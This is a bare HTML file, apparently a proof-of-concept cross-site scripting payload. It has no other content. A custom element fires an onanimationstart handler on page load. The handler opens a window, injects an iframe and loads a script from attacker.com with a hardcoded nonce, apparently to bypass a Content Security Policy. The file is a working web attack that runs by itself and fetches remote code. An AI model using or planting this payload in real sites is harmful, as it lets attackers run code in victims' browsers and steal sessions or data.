<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<style>@keyframes GGGGGoZTSGGGGGG{}</style>
<xss style=animation-name:GGGGGoZTSGGGGGG onanimationstart="w=window.open('about:blank'); w.document.write('<iframe id=GGGoZTSGGGG src=about:blank><\/iframe><script>GGGoZTSGGGG.addEventListener(\x22load\x22,()=>{GGGoZTSGGGG.srcdoc=\x22<script src=https://attacker.com/static/static.js nonce=123><\\/script>\x22;},{once:true});<\/script>');"></xss>
</body>
</html>
